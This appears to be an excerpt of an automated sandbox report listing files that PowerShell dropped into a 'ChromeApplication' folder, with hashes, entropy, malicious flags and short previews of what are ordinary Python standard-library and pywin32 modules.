                                                                                                                                                                                                  SSDEEP:192:bqbZeElBn+fSCWT3kXo/rE6yZDbOKbKafMyDyX7:2ZeElBn+fSLQtDbRbIX7
                                                                                                                                                                                                  MD5:3FEC573C1329017514AE59E602836AB4
                                                                                                                                                                                                  SHA1:9D09532F0CD562EBCD1498249F290DA5C85BDA42
                                                                                                                                                                                                  SHA-256:97FBDE1DC49AEFC1239740553A8A07D0F74AE2A1A8060C54DACD018347DFAD9F
                                                                                                                                                                                                  SHA-512:CDE5918557A219A73C4750FE3285256F7B27087D28EC4F782BB3155A55DD53B9DC2EA31A4D079499C1FF29C46C59733862C18B7A5CDB227B9AB7185B274E9A1F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Code that packs and unpacks the Univgw structures...# See if we have a special directory for the binaries (for developers)..import pythoncom.from win32com.client import gencache..com_error = pythoncom.com_error._univgw = pythoncom._univgw...def RegisterInterfaces(typelibGUID, lcid, major, minor, interface_names=None):. ret = [] # return a list of (dispid, funcname for our policy's benefit. # First see if we have makepy support. If so, we can probably satisfy the request without loading the typelib.. try:. mod = gencache.GetModuleForTypelib(typelibGUID, lcid, major, minor). except ImportError:. mod = None. if mod is None:. import win32com.client.build.. # Load up the typelib and build (but don't cache) it now. tlb = pythoncom.LoadRegTypeLib(typelibGUID, major, minor, lcid). typecomp_lib = tlb.GetTypeComp(). if interface_names is None:. interface_names = []. for i in range(tlb.GetTypeInfoCount()):.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\util.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1030
                                                                                                                                                                                                  Entropy (8bit):4.44193815730948
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:4XDGwAD64VJZF80WHWQ/g6a6vh1ZMy6cvx16K67nBwa:y50647ZFIHVo6XvtMy6sEnSa
                                                                                                                                                                                                  MD5:0234252BED6F281EE2870D5CE30B539C
                                                                                                                                                                                                  SHA1:8B9BA395C4CDC7DD2627E91A2A2B93C15E6213FB
                                                                                                                                                                                                  SHA-256:EF265A6B2D99D45A776F178B7C495800ED817AE029E3D69C528CE55C16DD838A
                                                                                                                                                                                                  SHA-512:27E74951F7310C3A0CD68F0E9D8021CEE503A019AADD13F840C5EB5E59D42C4C992AD12057D8992B82AA72C7CBD79BB6B2618B8F9BDF24528375C20D6C10B4E4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""General utility functions common to client and server... This module contains a collection of general purpose utility functions..""".import pythoncom.import win32api.import win32con...def IIDToInterfaceName(iid):. """Converts an IID to a string interface name... Used primarily for debugging purposes, this allows a cryptic IID to. be converted to a useful string name. This will firstly look for interfaces. known (ie, registered) by pythoncom. If not known, it will look in the. registry for a registered interface... iid -- An IID object... Result -- Always a string - either an interface name, or '<Unregistered interface>'. """. try:. return pythoncom.ServerInterfaces[iid]. except KeyError:. try:. try:. return win32api.RegQueryValue(. win32con.HKEY_CLASSES_ROOT, "Interface\\%s" % iid. ). except win32api.error:. pass. except ImportError:.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32comext\adsi\adsi.pyd

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):76800
                                                                                                                                                                                                  Entropy (8bit):6.516814809906401
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:sZovc+wbS4qLRNmxLhKE5jy2WqE3RX8YFhz1c4jurq:sCS23RExLhKEMqE3JFhz1c4ju+
                                                                                                                                                                                                  MD5:C9D92DEAAD81286033BD8597BD56EBF3
                                                                                                                                                                                                  SHA1:F75832F9A318E03F3517C32F3BC739F09DEDD739
                                                                                                                                                                                                  SHA-256:0980993B3890D478E79CD122376773979B858429DDFD1372129A6ED5F0CD7849
                                                                                                                                                                                                  SHA-512:85EB98D008BE197DAF653189DB5153B06B27C93A96919964125C50ACAB1065D8F9F306D557593D95925C73EC024A97247B13EC5AD2C34223D2AC6853B002C6F3
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................b.................................a.................J..................Rich..................PE..L...t..d...........!.....................................................................@.............................H...(........P..L....................`......P...T...............................@...............h............................text............................... ..`.rdata..$q.......r..................@..@.data........0......................@....rsrc...L....P......................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32comext\adsi\adsicon.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12303
                                                                                                                                                                                                  Entropy (8bit):4.812594738230301
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:iesFrX0mFm6k1cfAf/flO590KP5yD4zxNjNMvvAw/3tcEI0SpEE3R1Snb+83Qgwz:yz0+xN+vvxtzSpEoR1OfQthVSfrsKbkd
                                                                                                                                                                                                  MD5:97001F17DB58C29F039147B67528F891
                                                                                                                                                                                                  SHA1:288383FBC5ED6630BCA5133C61667FEF99F1EF1A
                                                                                                                                                                                                  SHA-256:C6D18AE28861CE2A9C24F6F82943DAD9BB22B89CA9E010BDB3A4F987F5A37578
                                                                                                                                                                                                  SHA-512:05068DEF956ECE014A66F6FC51C66BE89C882EF1352CD4045A7C4836E5CE833838D9214F46FEA86DC91D506C00D5906B57377EA20C9ADD79D09944941FA5437D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:ADS_ATTR_CLEAR = 1.ADS_ATTR_UPDATE = 2.ADS_ATTR_APPEND = 3.ADS_ATTR_DELETE = 4.ADS_EXT_MINEXTDISPID = 1.ADS_EXT_MAXEXTDISPID = 16777215.ADS_EXT_INITCREDENTIALS = 1.ADS_EXT_INITIALIZE_COMPLETE = 2..ADS_SEARCHPREF_ASYNCHRONOUS = 0.ADS_SEARCHPREF_DEREF_ALIASES = 1.ADS_SEARCHPREF_SIZE_LIMIT = 2.ADS_SEARCHPREF_TIME_LIMIT = 3.ADS_SEARCHPREF_ATTRIBTYPES_ONLY = 4.ADS_SEARCHPREF_SEARCH_SCOPE = 5.ADS_SEARCHPREF_TIMEOUT = 6.ADS_SEARCHPREF_PAGESIZE = 7.ADS_SEARCHPREF_PAGED_TIME_LIMIT = 8.ADS_SEARCHPREF_CHASE_REFERRALS = 9.ADS_SEARCHPREF_SORT_ON = 10.ADS_SEARCHPREF_CACHE_RESULTS = 11.ADS_SEARCHPREF_DIRSYNC = 12.ADS_SEARCHPREF_TOMBSTONE = 13..ADS_SCOPE_BASE = 0.ADS_SCOPE_ONELEVEL = 1.ADS_SCOPE_SUBTREE = 2..ADS_SECURE_AUTHENTICATION = 0x1.ADS_USE_ENCRYPTION = 0x2.ADS_USE_SSL = 0x2.ADS_READONLY_SERVER = 0x4.ADS_PROMPT_CREDENTIALS = 0x8.ADS_NO_AUTHENTICATION = 0x10.ADS_FAST_BIND = 0x20.ADS_USE_SIGNING = 0x40.ADS_USE_SEALING = 0x80.ADS_USE_DELEGATION = 0x100.ADS_SERVER_BIND = 0x200..ADSTYPE_INVALID = 0.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32comext\adsi\demos\objectPicker.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1941
                                                                                                                                                                                                  Entropy (8bit):4.948611303861004
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:lHV2cCUG5d+jiWi2ctQuAlyFLLvBYwjm1baGooFHgpzZCWx/i:NctWit9A8xL5Ymm1baGooFApzpx/i
                                                                                                                                                                                                  MD5:BA0DAB35B6DCC0D124666CE5FB9EAEDB
                                                                                                                                                                                                  SHA1:DCE97AE0A508BA8D502D2D90B71FFB893EDAE84D
                                                                                                                                                                                                  SHA-256:E11BA5576094FBA15DDB5BE66E4E72FDA7E7F460593E8B815E026D2356B769D1
                                                                                                                                                                                                  SHA-512:D17C59AAD49807C15FC10ACE6D0BD4576F00A3041AD3DC394A7BA0D9425C22F4F3D5C6FAD45D59869A2A1AE20FE23EA7478EE28BCB8A7F717C8EFCCF18397AB9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# A demo for the IDsObjectPicker interface..import pythoncom.import win32clipboard.from win32com.adsi import adsi.from win32com.adsi.adsicon import *..cf_objectpicker = win32clipboard.RegisterClipboardFormat(CFSTR_DSOP_DS_SELECTION_LIST)...def main():. hwnd = 0.. # Create an instance of the object picker.. picker = pythoncom.CoCreateInstance(. adsi.CLSID_DsObjectPicker,. None,. pythoncom.CLSCTX_INPROC_SERVER,. adsi.IID_IDsObjectPicker,. ).. # Create our scope init info.. siis = adsi.DSOP_SCOPE_INIT_INFOs(1). sii = siis[0].. # Combine multiple scope types in a single array entry... sii.type = (. DSOP_SCOPE_TYPE_UPLEVEL_JOINED_DOMAIN | DSOP_SCOPE_TYPE_DOWNLEVEL_JOINED_DOMAIN. ).. # Set uplevel and downlevel filters to include only computer objects.. # Uplevel filters apply to both mixed and native modes.. # Notice that the uplevel and downlevel flags are different... sii.filterFlags.uplevel.bothModes = DSOP_FILT

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\tabnanny.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11630
                                                                                                                                                                                                  Entropy (8bit):4.476146454696836
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:2Ptt0X5MiaVbSI5LmOLNzFhFI9NSHvc4n4+FAhBhNSkpyPqP1P+FMC6nMqx0:1X5M9lNBLNzFhFIjSHvc4n4+FAhFJ0Pn
                                                                                                                                                                                                  MD5:D4EDAFFB57B5F7E6951E736CF97593C5
                                                                                                                                                                                                  SHA1:41FFCFBF3E0EFBCC5B9F8F1036750EFE5935E532
                                                                                                                                                                                                  SHA-256:2BC9219A65A25D5A5A9C602E34EB30E57AA92C0E1E5F88810B385B5671287563
                                                                                                                                                                                                  SHA-512:21C2770812D98D0E6E0E28F867BBC304409AA7B56D4EA3F7B6B6795011AD38E9D31B685B6C148D0DC9D986E052E34F3D2E02D9A4E55AB27E728C3B6725D2CDC3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#! /usr/bin/env python3...."""The Tab Nanny despises ambiguous indentation. She knows no mercy.....tabnanny -- Detection of ambiguous indentation....For the time being this module is intended to be called as a script...However it is possible to import it into an IDE and use the function..check() described below.....Warning: The API provided by this module is likely to change in future..releases; such changes may not be backward compatible..."""....# Released to the public domain, by Tim Peters, 15 April 1998.....# XXX Note: this is now a standard library module...# XXX The API needs to undergo changes however; the current code is too..# XXX script-like. This will be addressed later.....__version__ = "6"....import os..import sys..import tokenize....__all__ = ["check", "NannyNag", "process_tokens"]....verbose = 0..filename_only = 0....def errprint(*args):.. sep = "".. for arg in args:.. sys.stderr.write(sep + str(arg)).. sep = " ".. sys.stderr.write("\n")....def

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\tarfile.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):98505
                                                                                                                                                                                                  Entropy (8bit):4.4936859498516855
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:AemBoIoCvKP1bdtZdRcPe4Z1PEJAsI28bVqMLsiz+eG+4:mBoIyP1ZtT2P4I28b7Lsizpp4
                                                                                                                                                                                                  MD5:AFF6CDD5D1BF1F5D762722A8F2DE3682
                                                                                                                                                                                                  SHA1:9240104EF5E5A3CAD532EDB48F5284888303C582
                                                                                                                                                                                                  SHA-256:C64E0E9D426B82809A815277D43169CB1EEA2F9C95A954C9E5CDD666EC00783E
                                                                                                                                                                                                  SHA-512:2A09F0103A1CAA6AB108F27411CC3689A691B2021F891BBB1F71219C41986799BEB90902C5E83F6DB0226497AD5B4C0DFDEEA919BC4BE3F3ACF342C4B3C3CCB7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#!/usr/bin/env python3..#-------------------------------------------------------------------..# tarfile.py..#-------------------------------------------------------------------..# Copyright (C) 2002 Lars Gustaebel <lars@gustaebel.de>..# All rights reserved...#..# Permission is hereby granted, free of charge, to any person..# obtaining a copy of this software and associated documentation..# files (the "Software"), to deal in the Software without..# restriction, including without limitation the rights to use,..# copy, modify, merge, publish, distribute, sublicense, and/or sell..# copies of the Software, and to permit persons to whom the..# Software is furnished to do so, subject to the following..# conditions:..#..# The above copyright notice and this permission notice shall be..# included in all copies or substantial portions of the Software...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDI

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\telnetlib.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):23931
                                                                                                                                                                                                  Entropy (8bit):4.513930532086154
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:DyI08SF0rbykUKUIVl0RPB5Z9FrpvPsgeN9KOX2A4bVWVn:WASF0rukgI70RPB5Z9FrpvPsjN9Kw
                                                                                                                                                                                                  MD5:EB3B08FCEA31D18D33A07BD207D58138
                                                                                                                                                                                                  SHA1:F46BCA2B1F77A220229D678E0C134FE4E89BF0D7
                                                                                                                                                                                                  SHA-256:25012B9A5584CB996866A80A7A94BAF9BDC7567213561648DE7CA47D9F82B5D5
                                                                                                                                                                                                  SHA-512:4F673E37B236492F843384C693C8A37A13D8B72EEC107A9AD7218238A330B5824093D78E6A96B20952F2CE1F3F6939F311992D71095D7BBB8E47679199C6CCA9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:r"""TELNET client class.....Based on RFC 854: TELNET Protocol Specification, by J. Postel and..J. Reynolds....Example:....>>> from telnetlib import Telnet..>>> tn = Telnet('www.python.org', 79) # connect to finger port..>>> tn.write(b'guido\r\n')..>>> print(tn.read_all())..Login Name TTY Idle When Where..guido Guido van Rossum pts/2 <Dec 2 11:10> snag.cnri.reston......>>>....Note that read_all() won't read until eof -- it just reads some data..-- but it guarantees to read at least one byte unless EOF is hit.....It is possible to pass a Telnet object to a selector in order to wait until..more data is available. Note that in this case, read_eager() may return b''..even if there was data on the socket, because the protocol negotiation may have..eaten the data. This is why EOFError is needed in some cases to distinguish..between "no data" and "connection closed" (since the socket also appears ready..for reading when it is closed).....To

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\tempfile.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):30059
                                                                                                                                                                                                  Entropy (8bit):4.458883871447617
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:BNed/ue7EK/MBSxddEMDprcpdkddEJJS736fv1+N+l/zT:bed/uYE6M0xbEMDpopEuJJSefvkmT
                                                                                                                                                                                                  MD5:ADF281376FF2C17FE5648DAB3FF70635
                                                                                                                                                                                                  SHA1:9021298C6718C800AC40C08798DB4C5ECF254E93
                                                                                                                                                                                                  SHA-256:068FE9CF767803038445D0907CAA1012B7BEBA34125A59E5DBA6D29C3EBE0FE1
                                                                                                                                                                                                  SHA-512:98690E8B7E89ECEB5DC1DDAD07BF60B9BCD167D99545755E26AC8C12F0D01A023CBA2B20559C4D79CB16BFFACE0DA538D116AD219C83745FB6EA153E79A520A6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Temporary files.....This module provides generic, low- and high-level interfaces for..creating temporary files and directories. All of the interfaces..provided by this module can be used without fear of race conditions..except for 'mktemp'. 'mktemp' is subject to race conditions and..should not be used; it is provided for backward compatibility only.....The default path names are returned as str. If you supply bytes as..input, all return values will be in bytes. Ex:.... >>> tempfile.mkstemp().. (4, '/tmp/tmptpu9nin8').. >>> tempfile.mkdtemp(suffix=b'').. b'/tmp/tmppbi8f0hy'....This module also provides some data items to the user:.... TMP_MAX - maximum number of names that will be tried before.. giving up... tempdir - If this is set to a string before the first use of.. any routine from this module, it will be considered as.. another candidate location to store temporary files..."""....__all__ = [.. "NamedTemporaryFile", "Te

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\textwrap.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20266
                                                                                                                                                                                                  Entropy (8bit):4.4470622302172105
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:6jYFj/VIYzSu/AdorlSNMNt/KhV0q1uJN7J6CJap:6jYFj/bDAdWFOUNcC0p
                                                                                                                                                                                                  MD5:23A46648FFEC2BE524DEA36472771AFA
                                                                                                                                                                                                  SHA1:68BFBEE2540F7937B9C46EC5CF00D25539151019
                                                                                                                                                                                                  SHA-256:288D890D5440F4536EA74E75284C89931ECEF9D74D9033E8E9FA772C78789623
                                                                                                                                                                                                  SHA-512:70D95896F89DFFD2895240E38B771D8AB615EAE956979AC17DC5F4DA17CBA1898D83B2FB01DC4408426C3D0B9188916BD1138B4D8111070851EA2743E857423E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Text wrapping and filling..."""....# Copyright (C) 1999-2001 Gregory P. Ward...# Copyright (C) 2002, 2003 Python Software Foundation...# Written by Greg Ward <gward@python.net>....import re....__all__ = ['TextWrapper', 'wrap', 'fill', 'dedent', 'indent', 'shorten']....# Hardcode the recognized whitespace characters to the US-ASCII..# whitespace characters. The main reason for doing this is that..# some Unicode spaces (like \u00a0) are non-breaking whitespaces..._whitespace = '\t\n\x0b\x0c\r '....class TextWrapper:.. """.. Object for wrapping/filling text. The public interface consists of.. the wrap() and fill() methods; the other methods are just there for.. subclasses to override in order to tweak the default behaviour... If you want to completely replace the main wrapping algorithm,.. you'll probably have to override _wrap_chunks()..... Several instance attributes control various aspects of wrapping:.. width (default: 70).. the maximum width of w

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\this.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1031
                                                                                                                                                                                                  Entropy (8bit):4.7762509461988625
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:b9G79+7q737Kv7Vm7QXUJRfDDFWnLmjoOLSFDuCSy176Pff2fdgmsG0Fm:k79+7q737s7A7QXG93COWVB76HsdnsGx
                                                                                                                                                                                                  MD5:92F4A7B0A22F593C8BDF429CAC3D4589
                                                                                                                                                                                                  SHA1:958CCB19110A69ED6595B5F16C768CA73A85C469
                                                                                                                                                                                                  SHA-256:5A89B1A1F22384960E69C554633A98558231F11A48260952EBFC21CA10F0625C
                                                                                                                                                                                                  SHA-512:2E0A0118BE0F4B309E6286E8015FFE0885181A77B485BA39E528638757D59ADB2F15F9F2ACC04DE31794357556DD5CC622EC8D6526604CE6F3F8520C2B64D925
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:s = """Gur Mra bs Clguba, ol Gvz Crgref....Ornhgvshy vf orggre guna htyl...Rkcyvpvg vf orggre guna vzcyvpvg...Fvzcyr vf orggre guna pbzcyrk...Pbzcyrk vf orggre guna pbzcyvpngrq...Syng vf orggre guna arfgrq...Fcnefr vf orggre guna qrafr...Ernqnovyvgl pbhagf...Fcrpvny pnfrf nera'g fcrpvny rabhtu gb oernx gur ehyrf...Nygubhtu cenpgvpnyvgl orngf chevgl...Reebef fubhyq arire cnff fvyragyl...Hayrff rkcyvpvgyl fvyraprq...Va gur snpr bs nzovthvgl, ershfr gur grzcgngvba gb thrff...Gurer fubhyq or bar-- naq cersrenoyl bayl bar --boivbhf jnl gb qb vg...Nygubhtu gung jnl znl abg or boivbhf ng svefg hayrff lbh'er Qhgpu...Abj vf orggre guna arire...Nygubhtu arire vf bsgra orggre guna *evtug* abj...Vs gur vzcyrzragngvba vf uneq gb rkcynva, vg'f n onq vqrn...Vs gur vzcyrzragngvba vf rnfl gb rkcynva, vg znl or n tbbq vqrn...Anzrfcnprf ner bar ubaxvat terng vqrn -- yrg'f qb zber bs gubfr!"""....d = {}..for c in (65, 97):.. for i in range(26):.. d[chr(i+c)] = chr((i+13) % 26 + c)....print("".jo

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\threading.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):58845
                                                                                                                                                                                                  Entropy (8bit):4.40732639245589
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:2M81+KmC/gEGUXWyLOSpSI2gIk/fZtjinkKUd9aDJEi2OoOuTWJAkId6py5UwW9D:2bF6mf24RDKg9IEnO7IW+PdW97nX
                                                                                                                                                                                                  MD5:E6E1AAD9071428279781BEAD7D1B474C
                                                                                                                                                                                                  SHA1:A9850A2678A63E39CC3D60F0379A81F85CB7F0CA
                                                                                                                                                                                                  SHA-256:40F8B3A0F8E8C44CC43627CE2D97416F2CCB4152D621ACC8F169C7B4D1427315
                                                                                                                                                                                                  SHA-512:EADAD58B9322ECC59C45A580B37491355D1495F3FDFCA81192E0EE528ADC34CDCEFA5C5895EE5F7692C78FE7652D98F258F6C6D4B1C1EBD2DDBE924C110F1C48
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Thread module emulating a subset of Java's threading model."""....import os as _os..import sys as _sys..import _thread..import functools....from time import monotonic as _time..from _weakrefset import WeakSet..from itertools import islice as _islice, count as _count..try:.. from _collections import deque as _deque..except ImportError:.. from collections import deque as _deque....# Note regarding PEP 8 compliant names..# This threading model was originally inspired by Java, and inherited..# the convention of camelCase function and method names from that..# language. Those original names are not in any imminent danger of..# being deprecated (even for Py3k),so this module provides them as an..# alias for the PEP 8 compliant names..# Note that using the new PEP 8 compliant names facilitates substitution..# with the multiprocessing module, which doesn't provide the old..# Java inspired names.....__all__ = ['get_ident', 'active_count', 'Condition', 'current_thread',.. 'en

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\timeit.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13871
                                                                                                                                                                                                  Entropy (8bit):4.371086714933462
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:NSkzurY2n/UbxSni/eR9ETCWxFXCfs+8YXIHKutPPTJJeXXqJ79UE/J6MWZVkgj2:cLWbxii/kc/fXcsrHKut3TKXX296NZVI
                                                                                                                                                                                                  MD5:C6203F7BB9ECE6B3D3289A2E9BE08D6C
                                                                                                                                                                                                  SHA1:DF6A867CD0FB08947ACFB3939BA815B0E48DAA6D
                                                                                                                                                                                                  SHA-256:2632615C935A02D88636E5587955240CFD76D5DCCADC570719C3346E61D78182
                                                                                                                                                                                                  SHA-512:6CB49B882E7AD272C2AD0F852CDFEA0E01D458FBCCEAC1C279BA7D036F614B781C1607C49A788D635B92734B103D28446FA51E3E3A8CF4734BE06325F8DF59F7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#! /usr/bin/env python3...."""Tool for measuring execution time of small code snippets.....This module avoids a number of common traps for measuring execution..times. See also Tim Peters' introduction to the Algorithms chapter in..the Python Cookbook, published by O'Reilly.....Library usage: see the Timer class.....Command line usage:.. python timeit.py [-n N] [-r N] [-s S] [-p] [-h] [--] [statement]....Options:.. -n/--number N: how many times to execute 'statement' (default: see below).. -r/--repeat N: how many times to repeat the timer (default 5).. -s/--setup S: statement to be executed once initially (default 'pass')... Execution time of this setup statement is NOT timed... -p/--process: use time.process_time() (default is time.perf_counter()).. -v/--verbose: print raw timing results; repeat for more digits precision.. -u/--unit: set the output time unit (nsec, usec, msec, or sec).. -h/--help: print this usage message and exit.. --: separate options from

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\token.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2523
                                                                                                                                                                                                  Entropy (8bit):5.200512889670289
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:JlLcdqen2WIMekwDqkJVZuR4APJ4BUhCla9frYqR6FCgLzqUVndcELod:Tc/2xMeJJIhOGhsa9zgvzqUVn+Ew
                                                                                                                                                                                                  MD5:AA65A2487B85B91AB92597D0AB01B3DB
                                                                                                                                                                                                  SHA1:EFAB12AABDF40AE7C127678A4E398A0D8D7333C7
                                                                                                                                                                                                  SHA-256:DEEF9E816F02D761501BB6E28870B204E2341D39D3D5D0131F5853781CBF2C0E
                                                                                                                                                                                                  SHA-512:107CBAFEE254F31530768507318616CC177F014E84D4AC37280E5054AF94E70BCC3D578EBB608FCBBFE91211B8E6F4B5CC13C6E470736916101B2607912AB6DB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""Token constants."""..# Auto-generated by Tools/scripts/generate_token.py....__all__ = ['tok_name', 'ISTERMINAL', 'ISNONTERMINAL', 'ISEOF']....ENDMARKER = 0..NAME = 1..NUMBER = 2..STRING = 3..NEWLINE = 4..INDENT = 5..DEDENT = 6..LPAR = 7..RPAR = 8..LSQB = 9..RSQB = 10..COLON = 11..COMMA = 12..SEMI = 13..PLUS = 14..MINUS = 15..STAR = 16..SLASH = 17..VBAR = 18..AMPER = 19..LESS = 20..GREATER = 21..EQUAL = 22..DOT = 23..PERCENT = 24..LBRACE = 25..RBRACE = 26..EQEQUAL = 27..NOTEQUAL = 28..LESSEQUAL = 29..GREATEREQUAL = 30..TILDE = 31..CIRCUMFLEX = 32..LEFTSHIFT = 33..RIGHTSHIFT = 34..DOUBLESTAR = 35..PLUSEQUAL = 36..MINEQUAL = 37..STAREQUAL = 38..SLASHEQUAL = 39..PERCENTEQUAL = 40..AMPEREQUAL = 41..VBAREQUAL = 42..CIRCUMFLEXEQUAL = 43..LEFTSHIFTEQUAL = 44..RIGHTSHIFTEQUAL = 45..DOUBLESTAREQUAL = 46..DOUBLESLASH = 47..DOUBLESLASHEQUAL = 48..AT = 49..ATEQUAL = 50..RARROW = 51..ELLIPSIS = 52..COLONEQUAL = 53..OP = 54..AWAIT = 55..ASYNC = 56..TYPE_IGNORE = 57..TYPE_COMMENT = 58..SOFT_KEYWORD

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\tokenize.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26605
                                                                                                                                                                                                  Entropy (8bit):4.4796819072543625
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:gk38juhVciXCBRFY0VbUu/5Y2RGwrHfxGN8vlyk8fkRC:g8hVciXuRF2UGwrHINglykPRC
                                                                                                                                                                                                  MD5:A17093EC72AAEA5AC4577A66AA08A854
